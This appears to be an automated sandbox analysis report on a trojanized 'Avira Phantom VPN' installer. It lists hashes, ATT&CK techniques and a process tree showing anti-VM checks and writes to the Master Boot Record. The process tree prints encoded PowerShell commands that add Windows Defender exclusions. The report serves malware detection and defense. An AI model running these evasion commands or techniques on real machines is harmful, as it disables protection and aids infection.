21558bfc700970d50d5bd91e9908582e17660279c2250e16fd45aef1f68ea6e9

Analysis

max time kernel
146s
max time network
31s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
06-04-2023 12:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

AviraPhantomVPN.exe
Size

28.6MB
MD5

9466d6ac58ac215fb36794ce3f06a4e7
SHA1

d1ced42f619c5b4cc60951bd25287154974d3bff
SHA256

21558bfc700970d50d5bd91e9908582e17660279c2250e16fd45aef1f68ea6e9
SHA512

c7f1a0abf62359083bee4b33dcc8add0b4c5d55f240b0fa383e24c2f9992d40c8012d1ea71bb3b49a5bc0d67fe447361cf91d3d1bff7c564d6a7d36aea5606a2
SSDEEP

786432:zVVBHkKlbCkSxZhF9fplSYL7CuNS43ZfFI:zzB5lOj9LplbG6JFI

Score

9^/10

bootkit discovery evasion persistence trojan

Malware Config

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

VCR-2005-2023-09.02.2023.exeVCR-2005-2023-09.02.2023.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	VCR-2005-2023-09.02.2023.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	VCR-2005-2023-09.02.2023.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

VCR-2005-2023-09.02.2023.exeVCR-2005-2023-09.02.2023.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	VCR-2005-2023-09.02.2023.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	VCR-2005-2023-09.02.2023.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	VCR-2005-2023-09.02.2023.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	VCR-2005-2023-09.02.2023.exe

Executes dropped EXE 6 IoCs

Processes:

AviraPhantomVPN.tmpAvira Phantom VPN 2.41.1.25731.exeVCR-2005-2023-09.02.2023.exeAvira Phantom VPN 2.41.1.25731.tmpVCR-2005-2023-09.02.2023.exe

pid	process
908	AviraPhantomVPN.tmp
1752	Avira Phantom VPN 2.41.1.25731.exe
1528	VCR-2005-2023-09.02.2023.exe
544	Avira Phantom VPN 2.41.1.25731.tmp
1432	VCR-2005-2023-09.02.2023.exe
1336

Loads dropped DLL 14 IoCs

Processes:

AviraPhantomVPN.exeAviraPhantomVPN.tmpAvira Phantom VPN 2.41.1.25731.exeAvira Phantom VPN 2.41.1.25731.tmpVCR-2005-2023-09.02.2023.exeVCR-2005-2023-09.02.2023.exe

pid	process
1420	AviraPhantomVPN.exe
908	AviraPhantomVPN.tmp
908	AviraPhantomVPN.tmp
908	AviraPhantomVPN.tmp
908	AviraPhantomVPN.tmp
908	AviraPhantomVPN.tmp
1752	Avira Phantom VPN 2.41.1.25731.exe
544	Avira Phantom VPN 2.41.1.25731.tmp
544	Avira Phantom VPN 2.41.1.25731.tmp
544	Avira Phantom VPN 2.41.1.25731.tmp
544	Avira Phantom VPN 2.41.1.25731.tmp
1528	VCR-2005-2023-09.02.2023.exe
1432	VCR-2005-2023-09.02.2023.exe
1336

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

VCR-2005-2023-09.02.2023.exeVCR-2005-2023-09.02.2023.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	VCR-2005-2023-09.02.2023.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	VCR-2005-2023-09.02.2023.exe

Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

Processes:

VCR-2005-2023-09.02.2023.exeVCR-2005-2023-09.02.2023.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	VCR-2005-2023-09.02.2023.exe
File opened for modification	\??\PhysicalDrive0	VCR-2005-2023-09.02.2023.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

VCR-2005-2023-09.02.2023.exeVCR-2005-2023-09.02.2023.exe

pid process

1528 VCR-2005-2023-09.02.2023.exe
1432 VCR-2005-2023-09.02.2023.exe

pid	process
1528	VCR-2005-2023-09.02.2023.exe
1432	VCR-2005-2023-09.02.2023.exe

Drops file in Program Files directory 6 IoCs

Processes:

AviraPhantomVPN.tmp

description	ioc	process
File created	C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\is-M9KC3.tmp	AviraPhantomVPN.tmp
File created	C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\is-T437C.tmp	AviraPhantomVPN.tmp
File created	C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\unins000.msg	AviraPhantomVPN.tmp
File opened for modification	C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\unins000.dat	AviraPhantomVPN.tmp
File opened for modification	C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Avira Phantom VPN 2.41.1.25731.exe	AviraPhantomVPN.tmp
File created	C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\unins000.dat	AviraPhantomVPN.tmp

Runs net.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

Processes:

AviraPhantomVPN.tmppowershell.exepowershell.exeAvira Phantom VPN 2.41.1.25731.tmp

pid	process
908	AviraPhantomVPN.tmp
908	AviraPhantomVPN.tmp
744	powershell.exe
1584	powershell.exe
544	Avira Phantom VPN 2.41.1.25731.tmp
544	Avira Phantom VPN 2.41.1.25731.tmp
544	Avira Phantom VPN 2.41.1.25731.tmp
544	Avira Phantom VPN 2.41.1.25731.tmp
544	Avira Phantom VPN 2.41.1.25731.tmp
544	Avira Phantom VPN 2.41.1.25731.tmp
544	Avira Phantom VPN 2.41.1.25731.tmp
544	Avira Phantom VPN 2.41.1.25731.tmp
544	Avira Phantom VPN 2.41.1.25731.tmp
544	Avira Phantom VPN 2.41.1.25731.tmp
544	Avira Phantom VPN 2.41.1.25731.tmp
544	Avira Phantom VPN 2.41.1.25731.tmp
544	Avira Phantom VPN 2.41.1.25731.tmp
544	Avira Phantom VPN 2.41.1.25731.tmp
544	Avira Phantom VPN 2.41.1.25731.tmp
544	Avira Phantom VPN 2.41.1.25731.tmp
544	Avira Phantom VPN 2.41.1.25731.tmp
544	Avira Phantom VPN 2.41.1.25731.tmp

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 744 powershell.exe
Token: SeDebugPrivilege 1584 powershell.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

AviraPhantomVPN.tmp

pid process

908 AviraPhantomVPN.tmp
Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

Avira Phantom VPN 2.41.1.25731.tmp

pid process

544 Avira Phantom VPN 2.41.1.25731.tmp
544 Avira Phantom VPN 2.41.1.25731.tmp
544 Avira Phantom VPN 2.41.1.25731.tmp

description	pid	process
Token: SeDebugPrivilege	744	powershell.exe
Token: SeDebugPrivilege	1584	powershell.exe

pid	process
544	Avira Phantom VPN 2.41.1.25731.tmp
544	Avira Phantom VPN 2.41.1.25731.tmp
544	Avira Phantom VPN 2.41.1.25731.tmp

Suspicious use of WriteProcessMemory 48 IoCs

Processes:

AviraPhantomVPN.exeAviraPhantomVPN.tmpcmd.exeAvira Phantom VPN 2.41.1.25731.exeAvira Phantom VPN 2.41.1.25731.tmpnet.exeVCR-2005-2023-09.02.2023.exe

description	pid	process	target process
PID 1420 wrote to memory of 908	1420	AviraPhantomVPN.exe	AviraPhantomVPN.tmp
PID 1420 wrote to memory of 908	1420	AviraPhantomVPN.exe	AviraPhantomVPN.tmp
PID 1420 wrote to memory of 908	1420	AviraPhantomVPN.exe	AviraPhantomVPN.tmp
PID 1420 wrote to memory of 908	1420	AviraPhantomVPN.exe	AviraPhantomVPN.tmp
PID 1420 wrote to memory of 908	1420	AviraPhantomVPN.exe	AviraPhantomVPN.tmp
PID 1420 wrote to memory of 908	1420	AviraPhantomVPN.exe	AviraPhantomVPN.tmp
PID 1420 wrote to memory of 908	1420	AviraPhantomVPN.exe	AviraPhantomVPN.tmp
PID 908 wrote to memory of 1780	908	AviraPhantomVPN.tmp	cmd.exe
PID 908 wrote to memory of 1780	908	AviraPhantomVPN.tmp	cmd.exe
PID 908 wrote to memory of 1780	908	AviraPhantomVPN.tmp	cmd.exe
PID 908 wrote to memory of 1780	908	AviraPhantomVPN.tmp	cmd.exe
PID 1780 wrote to memory of 744	1780	cmd.exe	powershell.exe
PID 1780 wrote to memory of 744	1780	cmd.exe	powershell.exe
PID 1780 wrote to memory of 744	1780	cmd.exe	powershell.exe
PID 1780 wrote to memory of 744	1780	cmd.exe	powershell.exe
PID 1780 wrote to memory of 1584	1780	cmd.exe	powershell.exe
PID 1780 wrote to memory of 1584	1780	cmd.exe	powershell.exe
PID 1780 wrote to memory of 1584	1780	cmd.exe	powershell.exe
PID 1780 wrote to memory of 1584	1780	cmd.exe	powershell.exe
PID 908 wrote to memory of 1752	908	AviraPhantomVPN.tmp	Avira Phantom VPN 2.41.1.25731.exe
PID 908 wrote to memory of 1752	908	AviraPhantomVPN.tmp	Avira Phantom VPN 2.41.1.25731.exe
PID 908 wrote to memory of 1752	908	AviraPhantomVPN.tmp	Avira Phantom VPN 2.41.1.25731.exe
PID 908 wrote to memory of 1752	908	AviraPhantomVPN.tmp	Avira Phantom VPN 2.41.1.25731.exe
PID 908 wrote to memory of 1752	908	AviraPhantomVPN.tmp	Avira Phantom VPN 2.41.1.25731.exe
PID 908 wrote to memory of 1752	908	AviraPhantomVPN.tmp	Avira Phantom VPN 2.41.1.25731.exe
PID 908 wrote to memory of 1752	908	AviraPhantomVPN.tmp	Avira Phantom VPN 2.41.1.25731.exe
PID 908 wrote to memory of 1528	908	AviraPhantomVPN.tmp	VCR-2005-2023-09.02.2023.exe
PID 908 wrote to memory of 1528	908	AviraPhantomVPN.tmp	VCR-2005-2023-09.02.2023.exe
PID 908 wrote to memory of 1528	908	AviraPhantomVPN.tmp	VCR-2005-2023-09.02.2023.exe
PID 908 wrote to memory of 1528	908	AviraPhantomVPN.tmp	VCR-2005-2023-09.02.2023.exe
PID 1752 wrote to memory of 544	1752	Avira Phantom VPN 2.41.1.25731.exe	Avira Phantom VPN 2.41.1.25731.tmp
PID 1752 wrote to memory of 544	1752	Avira Phantom VPN 2.41.1.25731.exe	Avira Phantom VPN 2.41.1.25731.tmp
PID 1752 wrote to memory of 544	1752	Avira Phantom VPN 2.41.1.25731.exe	Avira Phantom VPN 2.41.1.25731.tmp
PID 1752 wrote to memory of 544	1752	Avira Phantom VPN 2.41.1.25731.exe	Avira Phantom VPN 2.41.1.25731.tmp
PID 1752 wrote to memory of 544	1752	Avira Phantom VPN 2.41.1.25731.exe	Avira Phantom VPN 2.41.1.25731.tmp
PID 1752 wrote to memory of 544	1752	Avira Phantom VPN 2.41.1.25731.exe	Avira Phantom VPN 2.41.1.25731.tmp
PID 1752 wrote to memory of 544	1752	Avira Phantom VPN 2.41.1.25731.exe	Avira Phantom VPN 2.41.1.25731.tmp
PID 544 wrote to memory of 1356	544	Avira Phantom VPN 2.41.1.25731.tmp	net.exe
PID 544 wrote to memory of 1356	544	Avira Phantom VPN 2.41.1.25731.tmp	net.exe
PID 544 wrote to memory of 1356	544	Avira Phantom VPN 2.41.1.25731.tmp	net.exe
PID 544 wrote to memory of 1356	544	Avira Phantom VPN 2.41.1.25731.tmp	net.exe
PID 1356 wrote to memory of 1088	1356	net.exe	net1.exe
PID 1356 wrote to memory of 1088	1356	net.exe	net1.exe
PID 1356 wrote to memory of 1088	1356	net.exe	net1.exe
PID 1356 wrote to memory of 1088	1356	net.exe	net1.exe
PID 1528 wrote to memory of 1432	1528	VCR-2005-2023-09.02.2023.exe	VCR-2005-2023-09.02.2023.exe
PID 1528 wrote to memory of 1432	1528	VCR-2005-2023-09.02.2023.exe	VCR-2005-2023-09.02.2023.exe
PID 1528 wrote to memory of 1432	1528	VCR-2005-2023-09.02.2023.exe	VCR-2005-2023-09.02.2023.exe

C:\Users\Admin\AppData\Local\Temp\AviraPhantomVPN.exe
"C:\Users\Admin\AppData\Local\Temp\AviraPhantomVPN.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1420

C:\Users\Admin\AppData\Local\Temp\is-K6VDR.tmp\AviraPhantomVPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-K6VDR.tmp\AviraPhantomVPN.tmp" /SL5="$70126,28849760,1046016,C:\Users\Admin\AppData\Local\Temp\AviraPhantomVPN.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:908

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-LFLUF.tmp\WebrootCommAgentService.bat""
3⤵
- Suspicious use of WriteProcessMemory
PID:1780

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ENC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACgAJwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXAAnACkA
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:744

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ENC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACgAWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBHAGUAdABFAG4AdgBpAHIAbwBuAG0AZQBuAHQAVgBhAHIAaQBhAGIAbABlACgAJwBVAFMARQBSAFAAUgBPAEYASQBMAEUAJwApACAAKwAgACcAXABBAHAAcABEAGEAdABhACcAKQA=
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1584

C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Avira Phantom VPN 2.41.1.25731.exe
"C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Avira Phantom VPN 2.41.1.25731.exe" /install /quiet /norestart
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1752

C:\Users\Admin\AppData\Local\Temp\is-VL2CS.tmp\Avira Phantom VPN 2.41.1.25731.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VL2CS.tmp\Avira Phantom VPN 2.41.1.25731.tmp" /SL5="$101B8,7215309,64512,C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Avira Phantom VPN 2.41.1.25731.exe" /install /quiet /norestart
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:544

C:\Windows\SysWOW64\net.exe
"net" stop "AviraPhantomVPN"
5⤵
- Suspicious use of WriteProcessMemory
PID:1356

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "AviraPhantomVPN"
6⤵
PID:1088

C:\Users\Admin\AppData\Local\Temp\is-LFLUF.tmp\VCR-2005-2023-09.02.2023.exe
"C:\Users\Admin\AppData\Local\Temp\is-LFLUF.tmp\\VCR-2005-2023-09.02.2023.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1528

C:\Users\Admin\AppData\Local\Temp\is-LFLUF.tmp\VCR-2005-2023-09.02.2023.exe
"C:\Users\Admin\AppData\Local\Temp\is-LFLUF.tmp\\VCR-2005-2023-09.02.2023.exe"
4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1432

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Bootkit

T1067

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Avira Phantom VPN 2.41.1.25731.exe
Filesize
7.2MB

MD5
bf245b7db7637e6b2991105f62cc76de

SHA1
1d7252929d5c4cb404a34e553b72757729c701d5

SHA256
c414e764c53a81c6beb2c393635044661da238380492c182162b37f3e82a8c89

SHA512
08380e7ab2012f453ec4cb72646ca3a920d32f2f253f5c956b239780d1d08e434c4353580f6f9c95317b0e76810bc9351def59039350b96a4d989ece80722076

Download Submit
C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Avira Phantom VPN 2.41.1.25731.exe
Filesize
7.2MB

MD5
bf245b7db7637e6b2991105f62cc76de

SHA1
1d7252929d5c4cb404a34e553b72757729c701d5

SHA256
c414e764c53a81c6beb2c393635044661da238380492c182162b37f3e82a8c89

SHA512
08380e7ab2012f453ec4cb72646ca3a920d32f2f253f5c956b239780d1d08e434c4353580f6f9c95317b0e76810bc9351def59039350b96a4d989ece80722076

Download Submit
C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\unins000.exe
Filesize
3.2MB

MD5
709f58ff64c336a777ab15d80e18202c

SHA1
7c0e403482cf019e04d3ef5dcda3ef0e45d4c7c3

SHA256
a5ee7f4c0ccbba0f695fee64edee7bacf5f59d7f1bf72d54621394e44a633003

SHA512
59af9bd796bf9b42ef651483255a60a15b0557162d714c87337e7be2b631f00fc2ee32cd2b367133492c390f26ba8cef2a57245436f3bc63c03a5408a91368b5

Download Submit
C:\ProgramData\mntemp
Filesize
16B

MD5
10713815c03bd997648d64ae59e69d6c

SHA1
7631b6c32697dd5051bd70ce4d2458b2673d070e

SHA256
2dc669f02bdc7629ca154666c766c413163aed5dc27d93201d576272e5a3ad91

SHA512
a9ccb87fafcad7eaaf051e937684d6aa9ab616bbcbeb99a35dd2b7ac9543392b893e5036755d25f5a32bd0790e2e8117d700143ef28f729b346b56415646f5cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15282\python39.dll
Filesize
4.3MB

MD5
7e9d14aa762a46bb5ebac14fbaeaa238

SHA1
a5d90a7df9b90bdd8a84d7dc5066e4ea64ceb3d9

SHA256
e456ef44b261f895a01efb52d26c7a0c7d7d465b647a7b5592708ebf693f12a3

SHA512
280f16348df1c0953bbc6f37ff277485351171d0545ebe469bacd106d907917f87584154aec0f193f37322bc93ac5433cd9a5b5c7f47367176e5a8b19bbd5023

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-K6VDR.tmp\AviraPhantomVPN.tmp
Filesize
3.2MB

MD5
709f58ff64c336a777ab15d80e18202c

SHA1
7c0e403482cf019e04d3ef5dcda3ef0e45d4c7c3

SHA256
a5ee7f4c0ccbba0f695fee64edee7bacf5f59d7f1bf72d54621394e44a633003

SHA512
59af9bd796bf9b42ef651483255a60a15b0557162d714c87337e7be2b631f00fc2ee32cd2b367133492c390f26ba8cef2a57245436f3bc63c03a5408a91368b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-K6VDR.tmp\AviraPhantomVPN.tmp
Filesize
3.2MB

MD5
709f58ff64c336a777ab15d80e18202c

SHA1
7c0e403482cf019e04d3ef5dcda3ef0e45d4c7c3

SHA256
a5ee7f4c0ccbba0f695fee64edee7bacf5f59d7f1bf72d54621394e44a633003

SHA512
59af9bd796bf9b42ef651483255a60a15b0557162d714c87337e7be2b631f00fc2ee32cd2b367133492c390f26ba8cef2a57245436f3bc63c03a5408a91368b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-LFLUF.tmp\VCR-2005-2023-09.02.2023.exe
Filesize
235.1MB

MD5
9e357c500b1a960d82c9e65063473eff

SHA1
de6d8d3deb7e81035fe4f941ac60571985e94611

SHA256
7064cfd269ed6809706dd3cfea577b0ae13080f92af6b491ab8e05365eb8c947

SHA512
1ff4ebbdad9256c012c4c1c8c37be5f2c122a09b59ff80c5e4357ad2df4f65216fb9fe60b1baee8129072e267e54a36408cdf11691c59902c32d7558a2562da3

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-LFLUF.tmp\VCR-2005-2023-09.02.2023.exe
Filesize
237.3MB

MD5
922f79f8cd8441399b277ecfd291898c

SHA1
6ea68f6d319bdbb3473a6765952c8a906aedd113

SHA256
70661346359b4d8ca426f8c9906ddf1dc09f04edc83374084e428105e353ceb9

SHA512
b8af66853d6da04f1980fb78e918c02ee2c22aa70e4b7f9ab84af1d49287e4b0c49fac7e74ca700d030162f49b3495fa1418d736b692cb4d569c526f897292e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-LFLUF.tmp\VCR-2005-2023-09.02.2023.exe
Filesize
220.5MB

MD5
9892a0650107e63c8770d4b0373d8a4c

SHA1
a4eae83258049444f8fe87b83bc58e68f2718cc4

SHA256
a68bc4738b7268a40cbf164ea98d389098dbfd2c7f18c253a9e9ea34ad63101b

SHA512
88d2561844437ab93205efb57d2183b9dd520b1ec9861458daf6f84cf145930b917555a973f77cab39a8194517b6b03fac34ee6aed414a458931fa530bbc9d04

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-LFLUF.tmp\WebrootCommAgentService.bat
Filesize
465B

MD5
357f5b062141f4f796a463e2ca373a9f

SHA1
c5eded68e24b0e9a05ec852205e181e9f33eaa00

SHA256
c909ac1fca71db5a322994ec8eb956a1c0c0fbb83410af38c6d4a8922381d373

SHA512
43bce27cffb7949eb9394e4006b3f91cffd89d6564a0fabb6f49beb15e33c243eda71f69be25c0c8e688edc907656d5fd6b2dff6c862b5c94f5562bdfcb14041

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-VL2CS.tmp\Avira Phantom VPN 2.41.1.25731.tmp
Filesize
911KB

MD5
02c5691af81933ce36735946e3ed1ea4

SHA1
2faed8d51a0800f127e424bfba9d44bab6aee1b2

SHA256
e1f5e87796c015e567153db6b994a35a34b0819b1093d1ea12064ee35102c42d

SHA512
ebde4772c94f5199a2936f8fdbcf80e57d11a820276b1e1323fbcde6d192cd89bcc69a441cff17e26d688427fe05e62cc858e896c0647d93c9e2ebe74a6e6749

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SU44EWRB11YL2X1UZJUZ.temp
Filesize
7KB

MD5
8314e78080c6d3ce5793141c45dea305

SHA1
db4225aa265141864066b69b2d2fd3f489d38984

SHA256
92bf852e51fc65eb324dc3b1e9dfed0d3cca973882330c775e8bb9fded2fc018

SHA512
4831b0050c18cea8e28ae877aa16a8a40222afd90be8487727504bb9647508aaf39443bf8a24e8a8a0e5fde6b85879cd67cce56d9ab15ca44dc6707dce922d11

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
8314e78080c6d3ce5793141c45dea305

SHA1
db4225aa265141864066b69b2d2fd3f489d38984

SHA256
92bf852e51fc65eb324dc3b1e9dfed0d3cca973882330c775e8bb9fded2fc018

SHA512
4831b0050c18cea8e28ae877aa16a8a40222afd90be8487727504bb9647508aaf39443bf8a24e8a8a0e5fde6b85879cd67cce56d9ab15ca44dc6707dce922d11

Download Submit
\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Avira Phantom VPN 2.41.1.25731.exe
Filesize
7.2MB

MD5
bf245b7db7637e6b2991105f62cc76de

SHA1
1d7252929d5c4cb404a34e553b72757729c701d5

SHA256
c414e764c53a81c6beb2c393635044661da238380492c182162b37f3e82a8c89

SHA512
08380e7ab2012f453ec4cb72646ca3a920d32f2f253f5c956b239780d1d08e434c4353580f6f9c95317b0e76810bc9351def59039350b96a4d989ece80722076

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI15282\python39.dll
Filesize
4.3MB

MD5
7e9d14aa762a46bb5ebac14fbaeaa238

SHA1
a5d90a7df9b90bdd8a84d7dc5066e4ea64ceb3d9

SHA256
e456ef44b261f895a01efb52d26c7a0c7d7d465b647a7b5592708ebf693f12a3

SHA512
280f16348df1c0953bbc6f37ff277485351171d0545ebe469bacd106d907917f87584154aec0f193f37322bc93ac5433cd9a5b5c7f47367176e5a8b19bbd5023

Download Submit
\Users\Admin\AppData\Local\Temp\is-K6VDR.tmp\AviraPhantomVPN.tmp
Filesize
3.2MB

MD5
709f58ff64c336a777ab15d80e18202c

SHA1
7c0e403482cf019e04d3ef5dcda3ef0e45d4c7c3

SHA256
a5ee7f4c0ccbba0f695fee64edee7bacf5f59d7f1bf72d54621394e44a633003

SHA512
59af9bd796bf9b42ef651483255a60a15b0557162d714c87337e7be2b631f00fc2ee32cd2b367133492c390f26ba8cef2a57245436f3bc63c03a5408a91368b5

Download Submit
\Users\Admin\AppData\Local\Temp\is-LFLUF.tmp\VCR-2005-2023-09.02.2023.exe
Filesize
248.2MB

MD5
6544fbd858ca239df2053801bb00c11c

SHA1
e557df0ea9c41d67f0b1ee93298bf1bf98aed0ef

SHA256
e61a3ef667f73bfb58c3c77eec0281d3efb3809006510c731642fe9afd477eb5

SHA512
5bf125ad5b065631d9ea16e8d9ec0d0882c9414729738d393e9e7a690202ebcfea001954b1f8db7291e3a6715088cd40bbe86ea3c54e523f0ef76ec858d1968f

Download Submit
\Users\Admin\AppData\Local\Temp\is-LFLUF.tmp\VCR-2005-2023-09.02.2023.exe
Filesize
210.2MB

MD5
46dbe9e6dbc7350dc37163c155eeb260

SHA1
6bf24c35c90e578f2e0034781625cb3a41cdd9a1

SHA256
d66fb28cd25b08d2c1dfdf45efa97aabd1c4792ec99728237ccc7ab1288096a2

SHA512
c07c5afde5464bc05e00214908eb64646e09121660b7d465ae6fb00ef970ff19d921e6588ba9d5ddc369556b8b006b20e02ecbed3b751a1bd7cf04801db5f7b5

Download Submit
\Users\Admin\AppData\Local\Temp\is-LFLUF.tmp\VCR-2005-2023-09.02.2023.exe
Filesize
132.2MB

MD5
dc21112116048d7461876e5e7780da06

SHA1
5b1c003a74a08d75d0e40c3e34286ce0f043840e

SHA256
6da54e65437735a8b85ea75ae47a088c6c62ed6416597f29aaf3c2bb978970a6

SHA512
ef1c464a7f0c210d63e04807999ed5a593e6bd59dc3c4f6f0f340adbd4213fc5d04f875836858582a5530f29bc4fca3196241f1972cfc8bc439367ce8865dd66

Download Submit
\Users\Admin\AppData\Local\Temp\is-LFLUF.tmp\VCR-2005-2023-09.02.2023.exe
Filesize
139.8MB

MD5
ea305a534d3ba0db3fb1fd9fef8660e8

SHA1
0a3ae694f6eadf7c592b05e542136d96c7933284

SHA256
43af0f7a242cd3fca5c41c7426351de8069be3c1710986deb6793e3906e97158

SHA512
eb92f160e3b2360c41657b48e234994f50fad6c9ddf53242a0c64e8ef1b1621d8eff10b04823934c1b43d7b1c07d9671e315a58c2ba8fd2223441b494ad717ba

Download Submit
\Users\Admin\AppData\Local\Temp\is-LFLUF.tmp\_isetup\_iscrypt.dll
Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
\Users\Admin\AppData\Local\Temp\is-LFLUF.tmp\_isetup\_isdecmp.dll
Filesize
28KB

MD5
077cb4461a2767383b317eb0c50f5f13

SHA1
584e64f1d162398b7f377ce55a6b5740379c4282

SHA256
8287d0e287a66ee78537c8d1d98e426562b95c50f569b92cea9ce36a9fa57e64

SHA512
b1fcb0265697561ef497e6a60fcee99dc5ea0cf02b4010da9f5ed93bce88bdfea6bfe823a017487b8059158464ea29636aad8e5f9dd1e8b8a1b6eaaab670e547

Download Submit
\Users\Admin\AppData\Local\Temp\is-LFLUF.tmp\innocallback.dll
Filesize
63KB

MD5
1c55ae5ef9980e3b1028447da6105c75

SHA1
f85218e10e6aa23b2f5a3ed512895b437e41b45c

SHA256
6afa2d104be6efe3d9a2ab96dbb75db31565dad64dd0b791e402ecc25529809f

SHA512
1ec4d52f49747b29cfd83e1a75fc6ae4101add68ada0b9add5770c10be6dffb004bb47d0854d50871ed8d77acf67d4e0445e97f0548a95c182e83b94ddf2eb6b

Download Submit
\Users\Admin\AppData\Local\Temp\is-P03RD.tmp\ISTask.dll
Filesize
66KB
